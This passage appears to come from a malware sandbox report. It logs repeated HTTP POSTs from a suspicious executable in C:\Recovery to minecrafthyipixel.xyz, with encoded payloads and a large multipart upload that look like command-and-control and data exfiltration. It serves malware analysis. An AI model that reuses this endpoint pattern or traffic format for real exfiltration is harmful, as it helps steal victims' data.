                                                                                                                                    Data Raw: 35 34 38 0d 0a 56 4a 7e 4c 7b 43 7c 5b 78 72 70 48 6b 71 77 49 7d 74 7c 55 7c 63 7a 52 79 5d 70 01 7d 5b 64 49 77 5d 65 0c 6d 62 79 4a 76 5f 68 02 69 5b 78 01 55 4b 71 40 77 04 77 49 6b 5c 69 00 68 5e 7e 0d 78 66 70 41 6a 05 67 02 61 62 7d 4f 74 71 5c 5b 7f 71 7e 01 69 6f 63 55 7e 67 6b 01 75 5c 7b 06 7c 5b 7d 00 7c 60 75 06 78 77 78 43 6f 59 70 04 78 6d 63 00 6d 5b 60 04 7b 60 7e 03 7c 63 6f 5b 78 01 67 59 7c 62 63 06 76 58 6c 49 7a 51 41 5b 68 59 74 08 7d 61 79 4e 75 0a 77 5d 6c 6f 60 00 60 59 7a 08 7a 61 61 02 7d 7c 6a 03 7a 62 7e 05 75 05 63 07 77 71 52 41 63 61 7a 50 7e 5d 7a 06 76 62 6d 05 76 66 77 50 7e 6f 75 04 77 6f 74 04 7e 63 6f 5b 6f 6c 5a 5a 7b 4e 66 4b 7c 6e 73 51 77 49 6f 5e 69 61 7e 09 7e 43 55 08 78 54 62 4e 7e 4c 53 06 7b 5d 46 51 6b 52 6c 08 7d 60 52 40 7d 5e 7a 4c 7b 7d 63 06 6f 62 78 4b 6b 58 67 4a 69 77 74 51 7c 70 58 51 7b 60 70 4f 7e 5c 73 5d 77 63 79 51 7b 5c 79 4b 77 66 68 07 7d 66 5a 06 7f 66 53 0c 76 62 55 49 7f 5c 5b 01 7c 77 72 0b 78 48 60 0d 7e 73 6b 05 75 5c 5f 4f 74 5f 5f 04 7f 4f 54 05 7d 42 56 0a 7d 59 63 44 75 61 51 47 78 72 6d 48 7d 4e 5f 02 7b 67 5e 04 78 77 70 4c 78 6d 77 02 78 72 6c 4b 78 5d 62 4e 7d 70 68 4b 78 59 7c 49 7d 5c 77 05 76 5f 7c 05 7c 6c 63 02 7f 59 74 0b 7c 5f 71 0b 76 7c 5a 04 78 52 70 49 76 60 54 43 79 4f 65 03 7d 6c 62 41 78 5f 54 00 76 4d 7f 4b 75 4f 70 05 74 5f 66 09 7c 70 7a 4f 77 4c 75 00 76 75 68 0a 7c 7c 69 01 74 6c 70 4c 7c 5d 70 00 78 42 67 02 7a 70 7e 44 7c 6d 74 0a 74 49 5e 07 7d 62 6e 42 7e 53 77 0d 78 6d 7a 41 7d 62 61 4d 7f 70 74 0c 7c 52 78 0c 7d 70 68 09 7e 77 76 05 78 7d 55 01 7b 5c 7c 49 7e 71 67 07 7e 67 73 42 7e 70 61 0a 79 4d 7c 00 7d 4c 60 00 77 63 53 0a 7a 71 71 01 77 66 64 48 7e 66 7c 02 7e 48 53 0b 77 72 73 00 7c 72 5b 06 7c 49 6a 4e 7b 48 6c 0b 7e 63 77 05 75 5c 69 4f 74 5f 61 01 7f 5f 62 00 7d 7c 52 4e 7d 77 6b 02 76 61 6b 48 7a 72 69 03 7c 60 53 06 78 77 68 00 7b 49 68 4f 7b 43 67 46 7a 4c 56 00 7a 63 5c 02 7b 5d 4e 5a 78 64 73 5a 7d 5b 6f 02 75 4f 74 48 7e 55 6c 5a 7d 64 78 4f 6b 07 61 09 62 52 78 07 7a 6c 7b 5b 74 5e 50 43
                                                                                                                                    Data Ascii: 548VJ~L{C|[xrpHkqwI}t|U|czRy]p}[dIw]embyJv_hi[xUKq@wwIk\ih^~xfpAjgab}Otq\[q~iocU~gku\{|[}|`uxwxCoYpxmcm[`{`~|co[xgY|bcvXlIzQA[hYt}ayNuw]lo``Yzzaa}|jzb~ucwqRAcazP~]zvbmvfwP~ouwot~co[olZZ{NfK|nsQwIo^ia~~CUxTbN~LS{]FQkRl}`R@}^zL{}cobxKkXgJiwtQ|pXQ{`pO~\s]wcyQ{\yKwfh}fZfSvbUI\[|wrxH`~sku\_Ot__OT}BV}YcDuaQGxrmH}N_{g^xwpLxmwxrlKx]bN}phKxY|I}\wv_||lcYt|_qv|ZxRpIv`TCyOe}lbAx_TvMKuOpt_f|pzOwLuvuh||itlpL|]pxBgzp~D|mttI^}bnB~SwxmzA}baMpt|Rx}ph~wvx}U{\|I~qg~gsB~payM|}L`wcSzqqwfdH~f|~HSwrs|r[|IjN{Hl~cwu\iOt_a_b}|RN}wkvakHzri|`Sxwh{IhO{CgFzLVzc\{]NZxdsZ}[ouOtH~UlZ}dxOkabRxzl{[t^PC
                                                                                                                                    Apr 19, 2024 13:42:33.711503029 CEST678INData Raw: 6d 58 62 58 7d 6c 72 5f 7a 5c 79 05 5c 07 0f 7d 62 60 67 7b 5a 4c 7e 4a 78 59 75 5d 63 62 72 5f 61 66 68 09 7e 6f 66 58 77 42 6f 58 7e 73 77 5f 6f 52 5d 02 7a 63 66 01 6b 0b 74 0a 77 49 70 03 69 4c 6e 0a 7a 53 59 51 61 7e 5b 43 6a 6e 54 40 50 73
                                                                                                                                    Data Ascii: mXbX}lr_z\y\}b`g{ZL~JxYu]cbr_afh~ofXwBoX~sw_oR]zcfktwIpiLnzSYQa~[CjnT@PsRkoNP|wx}I_Y{}|^{qZ|XwK}Y{A|NrSn``O~[pKt]rRyav[xVK{YjeO[~d]SaSQ^eAReoBWt{q\_Nu_}|f~A}Z{@qXV\WzCWc\CT_^WkkS]XcasHT`aVs|Zzp]ia@Z}c^RoTQ^gVSb
                                                                                                                                    Apr 19, 2024 13:42:33.711541891 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0
                                                                                                                                    Apr 19, 2024 13:42:33.880670071 CEST361OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 376
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:33.985332012 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:33.985574007 CEST376OUTData Raw: 57 5f 5e 5c 59 44 51 58 5c 5e 59 59 57 57 58 5b 54 51 5f 57 54 5e 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_^\YDQX\^YYWWX[TQ_WT^SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\%.>U",]3(0*>^'':,U1(*7!=+#,,.%$[. X -
                                                                                                                                    Apr 19, 2024 13:42:34.261830091 CEST774INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:34 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hmLF5kNbZy02py69BrJklgd8U0FfdfE2EBxGY%2Bkukco0PJ9u7zkO7JvJvf4qrc2U%2BLnt%2FHb7jTd76tEZ9J5p%2FUjhvd%2FI3wCKWkWsiUjuPZaxJ8aPPpEK%2B1lIfwcJYG65OHAIQ6gq694%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1c61f60ada0-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 1a 30 35 35 05 36 39 20 00 29 33 2e 5a 3d 09 21 5e 29 29 31 5d 20 2d 16 52 3b 3a 2c 5c 3f 15 2e 5d 31 23 03 1a 26 3d 24 51 25 30 21 59 00 1a 39 1b 23 2c 35 10 2d 17 21 58 2b 21 2e 00 20 31 3b 5c 2b 2d 2e 0b 34 3b 30 03 3f 10 07 1b 2f 28 38 15 3c 3b 22 02 2f 27 31 06 21 3b 2c 52 09 12 25 1a 2a 2b 38 5f 31 30 26 08 34 08 3c 10 28 3f 35 05 27 2b 0e 56 25 20 2b 06 2e 0b 39 08 31 00 07 1e 2a 2a 01 0f 22 3c 3d 56 32 04 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$05569 )3.Z=!^))1] -R;:,\?.]1#&=$Q%0!Y9#,5-!X+!. 1;\+-.4;0?/(8<;"/'1!;,R%*+8_10&4<(?5'+V% +.91**"<=V2.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:42:34.261862040 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0
                                                                                                                                    Apr 19, 2024 13:42:34.300662994 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 1876
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:34.405599117 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:34.405795097 CEST1876OUTData Raw: 52 59 5e 59 5c 40 51 58 5c 5e 59 59 57 54 58 5a 54 56 5f 5b 54 54 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY^Y\@QX\^YYWTXZTV_[TTS_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&>R!8]3 7'8)='Y%+&8- .T*]4'/5$[. X )
                                                                                                                                    Apr 19, 2024 13:42:34.682418108 CEST772INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:34 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KzL7FGlq8OFYhfxrpZ54wIZVwOBK%2Bs4kEU455EF3D15Dnssy4bgSTVOdR5BqLR8HHF%2Fq37ryNB%2BaPM6caDUc0IqUjqN1fig3ysz7oY3dJ7wTnUKJ2GkK7ER%2BpND6K97QPOQTZ%2BYVmr8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1c8b9b4ada0-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 1a 27 36 21 06 35 3a 24 02 29 30 22 5f 3d 09 3a 03 3d 29 26 04 23 2d 19 0e 3b 3a 37 00 3c 5d 2d 04 25 0d 00 0e 30 5b 27 0f 25 20 21 59 00 1a 39 5d 23 5a 31 58 2e 07 39 5a 3f 32 31 12 23 0b 3f 5c 3c 3d 2d 50 23 01 3f 15 2b 00 22 0b 2d 28 3b 0e 28 06 07 5a 3b 19 29 04 36 11 2c 52 09 12 26 0d 3f 2b 3c 10 32 33 3e 09 22 21 06 59 28 3c 2a 10 33 3b 20 1c 26 55 2b 07 2d 0c 3e 55 31 10 25 1f 2a 5c 3f 0a 23 02 21 52 26 14 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$'6!5:$)0"_=:=)&#-;:7<]-%0['% !Y9]#Z1X.9Z?21#?\<=-P#?+"-(;(Z;)6,R&?+<23>"!Y(<*3; &U+->U1%*\?#!R&.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:42:34.682482958 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.449740104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:34.038744926 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:34.143064976 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:34.143234015 CEST2512OUTData Raw: 57 58 5e 5a 59 47 54 5b 5c 5e 59 59 57 56 58 59 54 52 5f 59 54 5d 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WX^ZYGT[\^YYWVXYTR_YT]S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%2V"[&0 3;!?( 2*$U1+#2!* 7/0:$[. X !
                                                                                                                                    Apr 19, 2024 13:42:34.498954058 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:34 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qX6zWXy07TToBq%2FD7xjxb2xPp4jWkRcszWCM0%2B8tk%2BytRBgX7HzXAj3GKJi1sxyCX8D6LbOScQPjzzWYUpTcK0VbVioVkGBr4%2FhN5y92ZFAgxRU%2BkxC4u7n0TOWxLDTM3kIbXXckCx0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1c718af4552-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:34.499017954 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    2192.168.2.449741104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:34.726541042 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:34.830943108 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:34.831384897 CEST2512OUTData Raw: 57 58 5b 5e 59 45 54 59 5c 5e 59 59 57 54 58 59 54 54 5f 5c 54 5a 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WX[^YETY\^YYWTXYTT_\TZSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^'=164& 06>&<S&72=#Z ].5$[. X )
                                                                                                                                    Apr 19, 2024 13:42:35.172565937 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:35 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FSYDEPylVKKVSG0VHFDc%2F7h0RFd%2FKGqU1rBV2B2qizuZoX7JOgvbc9F8E2sQGO10jhabb6nBlD9kutMGXI4pnKWAIG3n%2BoWNrCWH7cdDVXzDctstlWjufcswX6yBS1IDbh%2Bkb8nADDo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1cb6eac7b94-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:35.172627926 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    3192.168.2.449743104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:35.752336979 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:35.858709097 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:35.859002113 CEST2512OUTData Raw: 57 58 5e 58 59 4b 54 59 5c 5e 59 59 57 50 58 5d 54 5a 5f 59 54 5b 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WX^XYKTY\^YYWPX]TZ_YT[SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^&=6T6$'35V?8')(V&]*R#");"<<.5$[. X
                                                                                                                                    Apr 19, 2024 13:42:36.223082066 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:36 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z0d1u3L4gDoB6WD25c%2BFcQubB5LyhHaHgv99U3p%2FVpsP6p6BmYyX%2B5ZBxYKpOwEiRP8GltK9oSd3rK9WvTEumMIdnvRE4EGKdlAUUlWNmVtC%2BXxuauqOqIddWcWTsAK3UJM27U4QZPs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1d1ce3c4554-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:36.223144054 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    4192.168.2.449744104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:36.556998968 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:42:36.661571980 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:36.661927938 CEST2512OUTData Raw: 57 54 5e 5b 59 43 54 55 5c 5e 59 59 57 54 58 52 54 51 5f 56 54 5a 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT^[YCTU\^YYWTXRTQ_VTZS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1>V";$Z$ '+P*8'&'%+. "2)7 ,(\-%$[. X )
                                                                                                                                    Apr 19, 2024 13:42:37.047378063 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:36 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P7ioUBMzDT%2B7iVTAZTI%2BEsdr2U0mg7GMhrRrc8jCaRmqrFgdkbozQhSa%2B1grNqxpsTcbRe6JO%2FaxUL1NG45Izmyh3Sl%2FCOc8nrpDKkwsPsiY6NGZ3FUxHZRvLR9Bc5Z7wkFImBCQgC4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca1d6da861d66-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:42:37.047442913 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    5192.168.2.449747104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:42:37.291600943 CEST432OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: multipart/form-data; boundary=----SKVkDmmIXvVPlbJZk2vuH9rP9KPHZ1VSvi
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 147982
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:42:37.396292925 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:37.396503925 CEST12890OUTData Raw: 2d 2d 2d 2d 2d 2d 53 4b 56 6b 44 6d 6d 49 58 76 56 50 6c 62 4a 5a 6b 32 76 75 48 39 72 50 39 4b 50 48 5a 31 56 53 76 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                                                                    Data Ascii: ------SKVkDmmIXvVPlbJZk2vuH9rP9KPHZ1VSviContent-Disposition: form-data; name="0"Content-Type: text/plainW]^\\DTU\^YYWPXZTQ_YTTSY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_
                                                                                                                                    Apr 19, 2024 13:42:37.501383066 CEST10312OUTData Raw: 71 64 4e 78 65 65 6d 7a 61 37 64 70 51 4b 4f 2b 47 34 67 69 66 72 6b 4e 35 69 35 55 4b 72 66 50 6b 49 70 59 46 56 77 35 2f 33 4d 5a 38 35 69 78 49 38 47 48 4d 5a 73 47 34 74 65 61 46 57 78 6d 61 4a 41 72 43 76 39 41 58 6f 37 78 45 53 32 54 67 6a
                                                                                                                                    Data Ascii: qdNxeemza7dpQKO+G4gifrkN5i5UKrfPkIpYFVw5/3MZ85ixI8GHMZsG4teaFWxmaJArCv9AXo7xES2TgjIqOuuXNhdSmviQaPMg9urDiiu5DV9srnJlRR66NH/crmnnXB8TXgu/MNAcK06F54N8leIHj9dSdC2PE8RrRmaX7ajv5xoHGP04/MzSttKgOi7Bn2t6eCdCVOp1urhUdQ5WJRhXn5ael72aRwFosy2aNXHRwgFdzKK
                                                                                                                                    Apr 19, 2024 13:42:37.501421928 CEST10312OUTData Raw: 74 71 4a 54 43 42 5a 6a 4f 58 61 51 4d 6c 44 76 69 57 54 70 5a 44 38 6d 63 66 51 71 51 65 46 6f 6f 36 2f 4e 44 4a 74 36 35 4d 43 64 67 44 67 75 37 46 4a 47 4b 4a 4b 48 38 70 54 55 57 75 63 63 6a 6f 31 6a 63 46 6e 4d 76 58 31 71 51 75 5a 6a 79 77
